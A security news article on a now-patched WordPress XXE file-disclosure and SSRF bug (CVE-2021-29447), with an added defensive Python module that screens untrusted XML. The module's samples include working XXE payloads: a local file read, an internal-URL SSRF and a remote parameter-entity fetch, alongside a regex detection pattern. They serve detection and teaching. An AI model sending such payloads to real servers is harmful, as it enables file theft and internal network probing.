An XML External Entity (XXE) injection bug in WordPress could allow attackers to remotely steal a victim’s files, researchers have revealed.
Security researchers at SonarSource who discovered the vulnerability published a blog post today (April 27) that provides technical details on the now-patched bug.
An XXE vulnerability allows an attacker to interfere with an application’s processing of XML data. This can enable them to view files on the application server filesystem and interact with any back-end or external systems that the application itself can access.
In this case, the XXE bug was present in WordPress versions 5.7 and below, and could allow for remote arbitrary file disclosure and server-side request forgery (SSRF).
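To make the file-disclosure and SSRF mechanics above concrete from the defender's side, here is an added example (not code from the article or from WordPress) that screens untrusted XML, such as metadata embedded in an uploaded media file, before it reaches a parser. It flags any DOCTYPE, and specifically any entity declared with SYSTEM or PUBLIC, which is how an XML document asks the parser to read a local file or fetch a URL. The sample documents are constructed for the demonstration, and the function names are the example's own; Python's ElementTree is used as the parser because it does not expand external entities, so the explicit check is defence in depth and a portable policy for parsers that do.

```python
import re
import xml.etree.ElementTree as ET

# An entity declaration that pulls content from outside the document.
# Matches both general entities (<!ENTITY x SYSTEM "...">) and parameter
# entities (<!ENTITY % x SYSTEM "...">), with either SYSTEM or PUBLIC ids.
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?:%\s+)?\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
)
# Any DOCTYPE at all: even internal-only entities enable entity-expansion
# attacks, so untrusted input has no legitimate reason to carry one.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)


def classify_xml(xml_text):
    """Return 'external-entity', 'doctype' or 'clean' for an XML document."""
    if EXTERNAL_ENTITY_RE.search(xml_text):
        return "external-entity"
    if DOCTYPE_RE.search(xml_text):
        return "doctype"
    return "clean"


def parse_untrusted_xml(xml_text):
    """Parse XML from an untrusted source, rejecting anything with a DTD.

    Raises ValueError with the classification so callers can log the reason.
    ElementTree itself will not fetch external entities, but refusing the
    document up front also blocks internal-entity expansion (billion laughs)
    and keeps the policy parser-independent.
    """
    verdict = classify_xml(xml_text)
    if verdict != "clean":
        raise ValueError(f"rejected XML: {verdict}")
    return ET.fromstring(xml_text)


def audit_samples(samples):
    """Classify a dict of name -> XML text and return name -> verdict."""
    return {name: classify_xml(text) for name, text in samples.items()}


# Constructed sample documents (hypothetical, not taken from the article).
SAMPLES = {
    # Ordinary embedded metadata: no DTD, should parse normally.
    "benign": '<?xml version="1.0"?><meta><title>Track 1</title></meta>',
    # Local file disclosure attempt via a SYSTEM entity.
    "file_read": (
        '<?xml version="1.0"?>'
        '<!DOCTYPE meta [<!ENTITY ext SYSTEM "file:///etc/hostname">]>'
        "<meta><title>&ext;</title></meta>"
    ),
    # SSRF attempt: the parser would be made to fetch an internal URL.
    "ssrf": (
        '<?xml version="1.0"?>'
        '<!DOCTYPE meta [<!ENTITY ext SYSTEM "http://127.0.0.1:8080/">]>'
        "<meta><title>&ext;</title></meta>"
    ),
    # Parameter entity form, which some filters that only look for a
    # plain "<!ENTITY name SYSTEM" pattern miss.
    "param_entity": (
        '<?xml version="1.0"?>'
        '<!DOCTYPE meta [<!ENTITY % ext SYSTEM "http://example.invalid/x.dtd"> %ext;]>'
        "<meta/>"
    ),
    # Internal entities only: no external fetch, but still a DTD.
    "internal_only": (
        '<?xml version="1.0"?>'
        '<!DOCTYPE meta [<!ENTITY a "aaaa"><!ENTITY b "&a;&a;&a;&a;">]>'
        "<meta><title>&b;</title></meta>"
    ),
}


if __name__ == "__main__":
    for name, verdict in audit_samples(SAMPLES).items():
        print(f"{name:14s} -> {verdict}")
    root = parse_untrusted_xml(SAMPLES["benign"])
    print("benign title:", root.findtext("title"))
```

Running the module classifies the four hostile samples as "external-entity" or "doctype" and parses only the benign one. In a PHP deployment the equivalent policy is the same: refuse documents that carry a DOCTYPE, and never enable entity substitution (such as PHP's `LIBXML_NOENT` flag) when parsing user-supplied XML.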
Restrictions
The blog post caveats that this issue is only present in systems running affected WordPress installations on PHP 8.
“Additionally, the permissions to upload media files are needed,” SonarSource researchers explained in the blog post.
“On a standard WordPress installation this translates to having author privileges. However, combined with another vulnerability or a plugin allowing visitors to upload media files, it could be exploited with lower privileges.”
The researchers disclosed the code vulnerability to the WordPress security team, who fixed it in the latest version (5.7.1) and assigned CVE-2021-29447.
Fix
WordPress, the world’s most popular content management software, powers around 40% of all websites in use, making it a clear target for malicious actors.
Fortunately, thanks to ongoing security work from the maintainers of the open source CMS framework, many sites running WordPress will now auto-update.
Web admins who do not have this feature enabled can update via their WordPress admin dashboard.
Source: https://portswigger.net/daily-swig/wordpress-xxe-injection-vulnerability-could-allow-attackers-to-remotely-steal-host-files